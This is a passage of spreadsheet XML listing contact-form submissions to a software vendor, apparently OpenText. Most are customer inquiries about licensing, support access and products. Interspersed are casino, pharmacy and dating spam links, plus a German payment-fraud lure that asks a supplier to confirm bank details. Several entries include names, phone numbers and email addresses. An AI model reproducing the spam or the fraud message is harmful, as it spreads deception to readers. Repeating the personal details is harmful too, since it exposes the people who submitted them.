    <t>We have a client that we are working with that may be interested in looking at Composer Notes.  Interested in any information on your partner program and whether there is a trial version of Composer available in order to get familiar with the toolset.</t>
  </si>
  <si>
    <t>Hi. My team is encountering some confusion that I'm hoping you can help us with as we're having a hard time getting answers internally. We're being told OpenText is preventing us from updating GigaTrust on some machines. Is that a known issue? Is there a way to address that? Have others from Cargill contacted you all about this? Thank you in advance!</t>
  </si>
  <si>
    <t>Hi. I'm trying to resolve what I think is some confusion. My team is being told that OpenText is preventing us from updating GigaTrust on a number of our machines, but we're having a hard time getting details so I thought I would reach out to you all directly. Can you provide more info? Is this a known issue? Have others at Cargill reached out about this already? Thank you in advance for your help!</t>
  </si>
  <si>
    <t xml:space="preserve">i purchased a magellan explorist 310 used it a few times all worked well except no knowledge how to really use it..so i put it away for maybe 2 years while in transition and now it wont even boot up their were no batteries in the gps when stored.  i installed the batteries and nothing i then hocked it up to my computer and still notheing.  please advise _x000D_
</t>
  </si>
  <si>
    <t>We are working on an ECM project proposal for one of our customers. We would like to be part of the LRA and would like to get the licensing cost for Documentum and Captiva products (working on the detailed product requirements). We have contacted Partner Desk Manager(partners@opentext.com). As we have to submit this proposal soon, we would appreciate your help in placing our company in the LRA and providing the cost on the products._x000D_
_x000D_
Looking forward to hear from you soon,_x000D_
_x000D_
Thanks &amp; Best Regards,_x000D_
John Mathew_x000D_
Mobile: 1-201-675-6888</t>
  </si>
  <si>
    <t>We are looking for a sentiment analysis tool for political and economic research. We are interested in your product, and if you can introduce it, it would be appreciated. Thank you._x000D_
https://www.opentext.com/what-we-do/products/discovery/information-access-platform/sentiment-analysis</t>
  </si>
  <si>
    <t>Hello,_x000D_
Currently, I am a Documentum consultant (freelancer) and I am interested in getting in touch with OpenText platform - in the near future I'm looking to switch to this platform._x000D_
To achieve this, first, I would like to guide me how to obtain an account which allows me to have access to user guide, APIs and developing tools._x000D_
_x000D_
Thank you,_x000D_
Emilian Utma_x000D_
DCTM consultant at InfoSquare (sub contractor of GsK Belgium)_x000D_
https://www.linkedin.com/in/emilian-utma-87a48b8/</t>
  </si>
  <si>
    <t xml:space="preserve">Consult regarding solution for new unit development. </t>
  </si>
  <si>
    <t>hello, is it possible to update my account by changing the mail address _x000D_
the previous one was nauman.sheikh.sword@axa-groupsolutions.com and te new one is : nauman.sheikh@axa.fr. _x000D_
_x000D_
i want to keep my password access etc... the same _x000D_
_x000D_
thanks for your help._x000D_
_x000D_
regards</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, Is Brava Desktop DXP supported in a terminal/Citrix environment? </t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://onlinelistcasino24.com/]real money casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino online&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t>Please send me the Exceed HostExplorer programming (API) documentation (heprog.chm).  I am using a corporate license that is pre-configured to not install the HostExplorer Software Development Kit.</t>
  </si>
  <si>
    <t>BRAVA: I cannot open legitimate *.dwg file. The message I get is "Model format not licensed"</t>
  </si>
  <si>
    <t xml:space="preserve">В нашей интернет аптеке вы сможете заказать софосбувир и даклатасвир по низкой стоимости _x000D_
 _x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/541/&gt;зелбораф инструкция&lt;/a&gt;_x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/567/&gt;ксалкори crizotinib&lt;/a&gt;_x000D_
 _x000D_
 _x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/906/]ленвима lenvima ленватиниб[/url]_x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/548/]ревлимид купить[/url]_x000D_
</t>
  </si>
  <si>
    <t>Brava problem: Some text on my *.dwg drawings show as squares rather than letters. I guess the some font types are not handled properly. How do I add the required fonts to Brava?</t>
  </si>
  <si>
    <t xml:space="preserve">I'm facing issue while try to change Content Server Workflow Genera TAB:_x000D_
_x000D_
[Maximum length of argument 'mapDirty' was exceeded.]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Please let me know the licensing model of Infoarchive and approx licensing cost.</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]online slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]casino slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino slots&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, ich hatte am 9.3 die Niederlassung in Düsseldorf angerufen und war an den Vertrieb weitergeleitet worden. Ich warte weiterhin auf die zugesagte Kontaktaufnahme via eMail / telefonisch._x000D_
_x000D_
Meine Anfrage betrifft die reine Desktop Applikation von ProVision (als Nachfolger von Metastorm Provision v.6.1.1.5) mit zunächst vielleicht 1-5 Lizenzen. Ich benötige hier Infos und Preise für den möglichen Einkauf des Produktes._x000D_
_x000D_
Vielen Dank!_x000D_
_x000D_
Beste Grüße,_x000D_
Stefan Ruhnau.</t>
  </si>
  <si>
    <t xml:space="preserve">Documentum package query._x000D_
Interested on a CRM pack._x000D_
Please call me on 07713775972 (UK). </t>
  </si>
  <si>
    <t>Hello, please contact me regarding saas solution to exchange information on b2b project (edi)</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://onlinelistcasino24.com/]kasino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;slot online&lt;/a&gt; _x000D_
online casino gambling</t>
  </si>
  <si>
    <t>We would like to know more in details about Extended ECM to archive SAP documents in sharepoint.</t>
  </si>
  <si>
    <t>★免打流水 祝测即宋18-88圆 每周APP再宋88白菜 ~!! _x000D_
专属客服QQ:340659818 _x000D_
专属链接:www.zb760.com 备用链接:www.zunbao120.com _x000D_
秒寸返增宋高达3%，寸多宋多哟~！！ _x000D_
下APP随时掏机即玩！再宋8-88菜金~！疯狂高额300%寸宋~！ _x000D_
【八大劳虎鸡、真人视讯、捕鱼、大漫贯、PT-SW】多种玩法~！</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://onlinelistcasino24.com/]casino games real money[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t>We're one of IT reseller_x000D_
Please quote us for OpenText Brava! Reader for reseller price._x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t xml:space="preserve">We are an IT reseller and have a customer enquiry for Brava! reader. Please advise if we can get reseller price. Thanks. </t>
  </si>
  <si>
    <t>коммерческое предложение по тендерному сопровождению _x000D_
http://ckpiz.info/page/kommercheskoe-predlojenie-po-tendernomu-soprovojdeniyu/</t>
  </si>
  <si>
    <t>We are looking for help with GDPR compliance.</t>
  </si>
  <si>
    <t>Sir/Madam,_x000D_
                 Myself Vishnu Vardhan Reddy M pursuing my 3rd year B.Tech in computer Science and Engineering from GITAM(Deemed to be University) seeking an opportunity as SUMMER INTERN at your esteemed organization._x000D_
_x000D_
_x000D_
waiting for your reply</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://onlinelistcasino24.com/]casino games[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online slots&lt;/a&gt; _x000D_
real money casino</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are looking for a potential EDI partner who can help us to transmit EDI to all our automotive suppliers. We understand that Covisint was acquired by Open text and we like to explore the opportunity. We are already working with Open Text on Vendor Invoice management._x000D_
_x000D_
Thanks,_x000D_
Rajesh</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://onlinelistcasino24.com/]online slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino online&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t xml:space="preserve">Ваш диагноз гепатита с? Это не приговор у нас вы можете приобрести новые препараты для лечение софосбувир и дакласвир _x000D_
 _x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/553/&gt;сутент цена&lt;/a&gt;_x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/568/&gt;зикадиа&lt;/a&gt;_x000D_
 _x000D_
 _x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/548/]купить ревлимид[/url]_x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/541/]зелбораф цена[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested with the Livelink Document Control solution._x000D_
Can you share me some information on this together with the quotation?_x000D_
</t>
  </si>
  <si>
    <t>Need a PMC for report builder 7</t>
  </si>
  <si>
    <t>Western Union has a 2007 agreement with EasyLink Services Corporation. Please point me to a contact person who can help me verify whether the agreement is still active, and if so, review a GDPR-related contract addendum._x000D_
_x000D_
Thanks,_x000D_
David Rodgers_x000D_
Western Union Counsel</t>
  </si>
  <si>
    <t xml:space="preserve">european brides to order because of business office_x000D_
_x000D_
"quite a few solutions of men and women are unequal, for example with regard to national healthcare, [url=https://charmdatescamreviews.wordpress.com/2018/01/25/charmdate-review/]CharmDate[/url] We are in support of time of day the group finally out, potentially working with actions which are not really popular, understood Alevtina Fedulova, who else clothes i would say the movement's report on applicants._x000D_
_x000D_
females regarding the ussr these make use of them put forward 44 candidates, not to mention barristers, Sociologists, experts, online marketers in addition to the musicians, due to December's elections to a better parliament._x000D_
_x000D_
The deputy run among president Boris Yeltsin's administration recounted recently he well-known female in this parliament when they would jazz up the place._x000D_
_x000D_
work Minister Gennady Melikyan, among the most the fact that perturbed [url=https://www.slideshare.net/charmdate/charm-datecom-tips-for-guys-to-avoid-dating-scams-or-frauds]charmdate[/url] an traditional western newspaper writers yet never shocker Russians, reported earlier this year in which it male need to have concern in the job industry and [url=http://www.prweb.com/releases/charmingdate/charmingdate_scam_protect/prweb11792473.htm]charmdate Scam[/url] a best lay was inside the house._x000D_
_x000D_
"why should i actually employ a lot of women when you are the male is without a job? Melikyan announced. "natural environment. that experts claim men work and ladies manage children and do the household chores,_x000D_
_x000D_
to Soviet days to weeks, adult females ended anchored symbol manifestation with the union parliament, with quota among 75 set-aside lotto tickets. these products performed sole 57 lottery tickets, or perhaps even reduce 6 %, In Russia's confident congress associated peoples's Deputies._x000D_
</t>
  </si>
  <si>
    <t>I am interested in any product that offers automated redaction services for pdfs and other documents.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Cancel Account number: 765694 And the account is listed under  Alexis Betts. account was created on line so it would be a retail F2M account._x000D_
Been trying to cancel  thu f2msupport@opentext.com  and also have talked to _x000D_
Bernice Healy_x000D_
_x000D_
ISR SMB West Business Network_x000D_
_x000D_
🕿   732-652-3642_x000D_
_x000D_
📠  732-623-6433_x000D_
_x000D_
✉️   bhealywe@opentext.com_x000D_
 </t>
  </si>
  <si>
    <t>I am interested in purchasing RightFax for our company.  It would be integrated with our Mitel phone system via a BrookTrout SR140 connection.</t>
  </si>
  <si>
    <t>Hi, i work for SAP. i registerd but still cannot login to knowledge center. Can you please help provide access to knowledge center.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
 _x000D_
I'm Alexis @ Mailbird. (getmailbird.com)_x000D_
While doing our screening, your company came out as a great fit for our audience._x000D_
 _x000D_
We develop an awarded email client for Windows PCs and are looking for partners to do install sharing : During the installation process of your product you suggest your users to co-install Mailbird in the meantime and we offer you a generous contribution for the valuable users you bring to us._x000D_
 _x000D_
Our current affiliate program rewards our partners 40% of sales generated but we're looking to offer you 70% of sales for such an integrated partnership._x000D_
Knowing that, as of Feb 2018, we currently convert 10% of our free users with an average sale of $24, it can be a significant amount for you._x000D_
 _x000D_
Is this something you could be interested in?_x000D_
 _x000D_
Alexis Dollé_x000D_
Growth @ Mailbird</t>
  </si>
  <si>
    <t>Looking for a sales contact to establish a product conversation</t>
  </si>
  <si>
    <t>Looking to get a price quote and some questions answered about an install.</t>
  </si>
  <si>
    <t xml:space="preserve">Need access to OpenText My Support account for Teleform_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">To get information about freshers recruitment drive </t>
  </si>
  <si>
    <t>I cannot access My Support after multiple attempts across multiple days.  I can log in but if I try to access My Support or open a ticket I receive the message, "No Access_x000D_
We're sorry, your account does not grant you access to this resource.".  The manager of our account for Travelers, David Makoski, has a screenshot showing my name as having access.  Can you assist in resolving?_x000D_
_x000D_
Thank you,_x000D_
Michael Gammon</t>
  </si>
  <si>
    <t>We currently use Exceed OnDemand, we are having to migrate to Exceed TurboX.  Who do I talk to about making sure our licenses are not an issue and also where do I download TurboX so we can start working on our test server</t>
  </si>
  <si>
    <t>Apply a job for Inside Sales Spanish I’m Reading</t>
  </si>
  <si>
    <t>I AM A SMALL FINANCIAL PLANNING BUSINESS LOOKING FOR EASY WAYS TO COMMUNICATE WITH CLIENTS AS A MASS AND INDIVIDUALLY. TRACK COMMUNICATION AND MARKET TO PERIODICALLY.  DO YOU HAVE ANY COST EFFECTIVE TOOLS I COULD USE?  I AM BEING TOLD TO CONSIDER SHARPSPRING HOWEVER AS A SHAREHOLDER OF OPENTEXT I WOULD PREFER OPENTEXT SOLUTIONS IF POSSIBLE.  I AM NOT A LARGE FIRM AND MY CLIENT BASE IS ROUGHLY 250 FAMILIES. THANK YOU FOR ANY HELP YOU MAY BE ABLE TO PROVIDE.</t>
  </si>
  <si>
    <t>Prezados boa tarde! Entrei em contato com a IMR para obter suporte do ALCHEMY RELEASE que possuo na versao 6. Na data de hoje recebi resposta que o software acima foi adquirido por esta empresa OpenText._x000D_
Assim, gostaria que me informassem a respeito se dao suporte na atualizacao do Alchemy. Att._x000D_
Dilson R Carvalho Jr.</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://onlinelistcasino24.com/]slot online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;cassino&lt;/a&gt; _x000D_
online casino gambling</t>
  </si>
  <si>
    <t>Looking for support options for existing Actuate Server platform at The Bank of New York Mellon. I have been trying to reach for the past 1 month using the contact numbers on website. But, couldn't reach any one.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am currently completing my Bachelor Degree in Human Resources at Conestoga. _x000D_
_x000D_
Presently, I am looking for a Human Resource Co-op and knew that OpenText was a wonderful opportunity. _x000D_
_x000D_
If you have any openings I would love to meet for an interview and discuss my qualifications further at your earliest convenience_x000D_
_x000D_
Best Regards,_x000D_
Mark Cummings-Snyder</t>
  </si>
  <si>
    <t>Hello -_x000D_
We are planning to upgrade our SQL Servers and we are running RightFax version 10.2 on SQL Server 2008 R2._x000D_
I need to know what is the highest level of SQL Server this version of RightFax supports._x000D_
Also, I need to know what is the newest version of RightFax available and what version of SQL Server that supports._x000D_
_x000D_
Thank You</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]casino online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online slots&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings,_x000D_
_x000D_
Our company utilizes your software to manage multiple functions, though only select employees are authorized to input information into the system to keep the information accurate.  There are many employees, however, who gather information to give to those select employees.  One of the main streams of information is in the form of expenses, specifically expense receipts and their reimbursement.  _x000D_
_x000D_
In our office, we process expenses for multiple employees by collecting paper receipts, scanning them and entering the information into Excel to create an expense report.  That report is then forwarded to accounting to be entered into Alchemy, coded for tax purposes and tracked for approval and reimbursement.  The process of doing it manually is cumbersome and an inefficient use of resources._x000D_
_x000D_
With so many software products in the area of receipt scanning and report creation, I’m interested in knowing if your software functions well with one or more of those expense tracking software programs.  Examples of programs that we are considering are Concur, Certify, Fresh Books, Expensify and Zoho.  We are just interested in trying it for our small office to start, but if it integrates well with employees and Alchemy alike, there is a chance that we can expand the use.  Can you please let me know what program(s) might work for us?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">need to connect with reseller in KSA, as we are looking to purchase CO-FAX. </t>
  </si>
  <si>
    <t>Inquiries for job vacancy for the position Software Quality Assurance Analyst.</t>
  </si>
  <si>
    <t xml:space="preserve">Врачи разроботали новое лекарство в лечение гепатита С, подробности на нашем сайте _x000D_
 _x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/570/&gt;имбрувика купить&lt;/a&gt;_x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/549/&gt;джакави купить&lt;/a&gt;_x000D_
 _x000D_
 _x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/550/]тагриссо купить в москве[/url]_x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/570/]имбрувика цена[/url]_x000D_
</t>
  </si>
  <si>
    <t>Für unseren Kunden (eine Bundesbehörde für öffentliche Sicherheit) suchen wir einen Kontakt zu Ihnen, für eine offizielle Einladung zu einem Markterkundungsverfahren.</t>
  </si>
  <si>
    <t>Legalkey Console Modules 4.19   ....is there a newer version available and if it works on Windows 10 64bit?</t>
  </si>
  <si>
    <t>We are ussing SAP VIM By open Text. According to SAP Note 2397425 we have to download "20170428_transport_license_report_vim.zip" from the link_x000D_
https://knowledge.opentext.com/knowledge/llisapi.dll/link/59872702 _x000D_
I have no acesss to this file ._x000D_
Please advise what I can do . _x000D_
Best _x000D_
_x000D_
Dennis</t>
  </si>
  <si>
    <t xml:space="preserve">Ваш диагноз гепатита с? Это не приговор у нас вы можете приобрести новые препараты для лечение софосбувир и дакласвир _x000D_
 _x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/552/&gt;caprelsa капрелса вандетаниб vandetanib&lt;/a&gt;_x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/862/&gt;руксолитиниб джакави&lt;/a&gt;_x000D_
 _x000D_
 _x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/485/]анагрелид купить[/url]_x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/570/]imbruvica ибрутиниб 140 мг[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi! When you say "For a small fee, users can upgrade to Brava! Desktop DXP and keep all the same functionality with no expiration date." Does that mean we pay the license cost one time, and not yearly? If the cost is one time, will there be updates? regards Lars-Erik</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]online casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t>Hello_x000D_
I bought a license of Brava DXP on line (order IGS-184912), but I haven't received any link to download the software and the license number. _x000D_
Please inform me about it as soon as possible._x000D_
Thanks_x000D_
Regards_x000D_
Janna</t>
  </si>
  <si>
    <t>My friend has 87 shares in Vignette , certificate C 8190, she hasn't had any correspondance from Open Text about the transfer of these, what should she do? I think she would like to sell them. Thank You</t>
  </si>
  <si>
    <t>Necesito cotizar Free DWG Viewer</t>
  </si>
  <si>
    <t>We are looking at replacing an on premises fax system that manages and distributes incoming faxes from 6 lines with a cloud based SaaS solution. The requirement is not high volume, they receive approximately 150 faxes per month each having an average of 3 pages. We would also like to keep the existing fax numbers</t>
  </si>
  <si>
    <t>Outlook Add-in für Connected Workspaces_x000D_
https://www.opentext.com/file_source/OpenText/en_US/PDF/opentext-product-overview-co-content-suite-platform-en.pdfhttps://www.opentext.com/file_source/OpenText/en_US/PDF/opentext-product-overview-co-content-suite-platform-en.pdf</t>
  </si>
  <si>
    <t>My support account is no longer allowing me to login for support documentation. Please could my support account be reactivated?</t>
  </si>
  <si>
    <t>Dear Team_x000D_
_x000D_
     As you know one if the biggest clients of Documentum in Algeria is the MDN and we are asking in this case if the retention module is included with their documentum, is it a separate license?</t>
  </si>
  <si>
    <t>啊萨达啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊萨达十大</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrter Capgemini Lieferant,_x000D_
_x000D_
während des Buchungsprozesses wurde eine Differenz zwischen den Überweisungsangaben in unserem System und auf Ihrer Rechnung (Nummer 9000313610), die wir von Ihnen erhalten haben, festgestellt. Deshalb, um Finanzbetrug zu verhindern, benötigen wir die Bestätigung Ihre Bankdetails._x000D_
_x000D_
Könnten Sie uns Ihre neue E-Mail Adresse angeben, damit wir unsere Anfrage mit der Anlage an Sie schicken könnte? In unserem System haben wir nicht mehr gültige E-Mail Addresse._x000D_
_x000D_
Oder könnten Sie uns per E-Mail bestätigen, ob das in der oben genannten Rechnung angegebene Bankkonto richtig ist?_x000D_
Sobald wir die angeforderten Informationen von Ihnen erhalten haben, werden wir mit der Zahlung Ihrer Rechnung fortfahren._x000D_
_x000D_
Vielen Dank im Voraus für Ihre Antwort._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Justyna Boesche_x000D_
</t>
  </si>
  <si>
    <t>"Teilen Sie unsere Vorfreude_x000D_
_x000D_
Am Vortag der Innovation Tour (Sonntag, 15. April 2018) findet im Infinity Hotel &amp; Conference Resort München ab 19:00 Uhr eine Abendveranstaltung statt, bei der Sie bereits die Gelegenheit haben, sich in entspannter Atmosphäre mit OpenText Experten und Partnern auszutauschen und einen ersten Blick auf den Ausstellungsbereich zu werfen. Für Ihr leibliches Wohl wird gesorgt._x000D_
"_x000D_
--&gt; echt jetzt, am Sonntag ? Die Vorfreude hält sich in Grenzen ..._x000D_
Glaubt OT wirklich, dass Kunden bereits Sonntag Mittag von zu Hause abreisen wegen einer Marketing-Abendveranstaltung ?</t>
  </si>
  <si>
    <t xml:space="preserve">Врачи разроботали новое лекарство в лечение гепатита С, подробности на нашем сайте _x000D_
 _x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/570/&gt;imbruvica ибрутиниб 140 мг&lt;/a&gt;_x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/550/&gt;тагриссо препарат инструкция&lt;/a&gt;_x000D_
 _x000D_
 _x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/549/]джакави цена[/url]_x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/541/]зелбораф цена[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi _x000D_
I registered for the 15 day trial , but I do not get the download link,  I have tried several times in the past, but no joy.  could you please send   thanks_x000D_
_x000D_
steve</t>
  </si>
  <si>
    <t>[url=http://levitra-20mg-priceof.online/]levitra-20mg-priceof.online.ankor[/url] &lt;a href="http://pricespharmacy-canadian.online/"&gt;pricespharmacy-canadian.online.ankor&lt;/a&gt; http://buy-amoxicillin-amoxil.online/</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo,_x000D_
_x000D_
bei meiner ersten Mail hatte ich versehentlich die falsche Mail-Adresse angegeben, diese kann ignoriert werden._x000D_
_x000D_
Ich arbeite in der IT am Fraunhofer Heinrich Hertz Institute._x000D_
Die Fraunhofer Gesellschaft nutzt ihr Produkte wie den Content Server und entsprechende Client Produkte. _x000D_
Diese wurden für alle Institute Lizensiert._x000D_
_x000D_
Ich möchte die Client Software an unserem Institut (HHI) automatisiert installieren und benötige daher Zugriff auf Ihre Dokumentationen, daher würde ich Sie bitten mir den "My Support" Zugang freizuschalten._x000D_
_x000D_
Mit freundlichen Grüßen / Best regards_x000D_
_x000D_
Maximilian Müller_x000D_
_x000D_
Administration IT_x000D_
Maximilian.mueller@hhi-extern.fraunhofer.de_x000D_
_x000D_
Tel +49 30 31002‐788_x000D_
_x000D_
Fraunhofer Heinrich Hertz Institute_x000D_
Einsteinufer 37, 10587 Berlin, Germany_x000D_
www.hhi.fraunhofer.de_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo,_x000D_
_x000D_
ich arbeite in der IT am Fraunhofer Heinrich Hertz Institute._x000D_
Die Fraunhofer Gesellschaft nutzt ihr Produkte wie den Content Server und entsprechende Client Produkte. _x000D_
Diese wurden für alle Institute lizenziert._x000D_
_x000D_
Ich möchte die Client Software an unserem Institut (HHI) automatisiert installieren und benötige daher Zugriff auf Ihre Dokumentationen, daher würde ich Sie bitten mir den "My Support" Zugang freizuschalten._x000D_
_x000D_
Mit freundlichen Grüßen / Best regards_x000D_
_x000D_
Maximilian Müller_x000D_
_x000D_
Administration IT_x000D_
Maximilian.mueller@hhi-extern.fraunhofer.de_x000D_
_x000D_
Tel +49 30 31002‐788_x000D_
_x000D_
Fraunhofer Heinrich Hertz Institute_x000D_
Einsteinufer 37, 10587 Berlin, Germany_x000D_
www.hhi.fraunhofer.de_x000D_
</t>
  </si>
  <si>
    <t>Invoice OCC implementation</t>
  </si>
  <si>
    <t>Har till uppgift att presentera olika kommunikationssystem/intranet för min största kund här i Ecuador. Eftersom jag själv drev en First Class server under tiden 1996-2013 så var jag nyfiken att se var ni är idag. Jag har försökt hitta priser för tjänsten på er webbsida utan resultat. Min kund driver 4 företag med sammanlagt ca 500 anställda.</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://onlinelistcasino24.com/]casino games[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino online&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Can you please confirm if any of the following applications are compatible/supported on Windows 10/Office 2016?_x000D_
_x000D_
eDocs	5.31.674_x000D_
Exceed	14.0.5_x000D_
HummingbirdExceed	14.0.0_x000D_
_x000D_
If not, can you please confirm which versions are?_x000D_
_x000D_
Thanks_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
We are a technology company with world-wide presence and mainly serving for the publishing &amp; medical industry._x000D_
_x000D_
In recent times, we are getting lot of queries for product similar to OpenText Web Experience Manager (WEM) &amp; Adobe Experience Manager (AEM)._x000D_
_x000D_
We have gone through the product features and very keen to know more about it. This will definitely help us to understand how this will add values to our existing customers and future prospects to improve their business._x000D_
_x000D_
If you can provide a trial license for us to understand it closely, that may eventually lead to a buying decision._x000D_
_x000D_
We would like to hear more from you._x000D_
_x000D_
Thanks,_x000D_
Praveen Nair</t>
  </si>
  <si>
    <t>cassino _x000D_
[url=http://onlinelistcasino24.com/]casino games slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino games&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t>Interested in a Doc management system for our branch</t>
  </si>
  <si>
    <t>I have a few questions about updating a documentation platform I work on.</t>
  </si>
  <si>
    <t>We cant open files on brava reader, it is saying we need a license/system update?_x000D_
If you could email me back when possible, that would be greatly appreciated.</t>
  </si>
  <si>
    <t>We are exploring ECM options and I would like to talk to a representative of OpenText to see how OpenText may be able to help</t>
  </si>
  <si>
    <t xml:space="preserve">Эротический массаж — особый вид массажа, применяемый как в качестве прелюдии к половому акту (для расслабления и возбуждения партнёров), так и в профилактических целях при функциональных расстройствах половой сферы. При таком виде массажа чаще всего используют приёмы поглаживания, расстирания, разминания и вибрации. _x000D_
[url=http://massage-erotic.ru/]massage-erotic[/url] _x000D_
 _x000D_
[url=http://buyandsellhair.com/author/yachtqueen0/]Click[/url]|_x000D_
</t>
  </si>
  <si>
    <t>Hello, I'm reaching out to determine if OpenText has interest in marketing to Machine Tool manufacturers and mid-sized manufacturing operations.  Our brand, Modern Machine Shop, has 90 years of experience in metalworking media.  Please let me know if there are any product or press releases that could be considered by our editors.  Thank you! Mike</t>
  </si>
  <si>
    <t>I bought the product Brava! Desktop DXP, but I don't received the link for install the software_x000D_
Invoice: 184903_x000D_
Please help me, I need used the software ASAP</t>
  </si>
  <si>
    <t>Hi, our company typically processes ~100k invoices per month. Current process involves getting scanned invoices from our customers and entering 5 fields into their SAP.  In the process of evaluating some solutions to augment or automate this process.  Would love to hear if this is something you can provide and if so talk about deployment timelines and pricing</t>
  </si>
  <si>
    <t>I'm interested in FirstClass server hosting. If you could provide me with information, that would be great. Thanks</t>
  </si>
  <si>
    <t>I'm interested in pricing options for the OpenText Teleform software. Please send me information about pricing.  Please let me know if you have special pricing for educational institutions such as mine and if so, what is the pricing structure? _x000D_
Please email me with a quote. _x000D_
_x000D_
Thank you.  _x000D_
_x000D_
Leila Espinosa</t>
  </si>
  <si>
    <t xml:space="preserve">В нашей интернет аптеке вы сможете заказать софосбувир и даклатасвир по низкой стоимости _x000D_
 _x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/550/&gt;тагриссо осимертиниб tagrisso osimertinib&lt;/a&gt;_x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/570/&gt;ибрутиниб отзывы&lt;/a&gt;_x000D_
 _x000D_
 _x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/570/]имбрувика купить[/url]_x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/550/]тагриссо препарат инструкция[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are looking at ECM solutions._x000D_
_x000D_
We have created a list of high level requirements that we would like to have validated.  After receiving a response to the requirements, we will also want to schedule a web demo of the software._x000D_
_x000D_
Please let me know who I can send our list of requirements to._x000D_
_x000D_
Thank you!_x000D_
_x000D_
David McLellan</t>
  </si>
  <si>
    <t xml:space="preserve">Ваш диагноз гепатита с? Это не приговор у нас вы можете приобрести новые препараты для лечение софосбувир и дакласвир _x000D_
 _x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/551/&gt;lynparza&lt;/a&gt;_x000D_
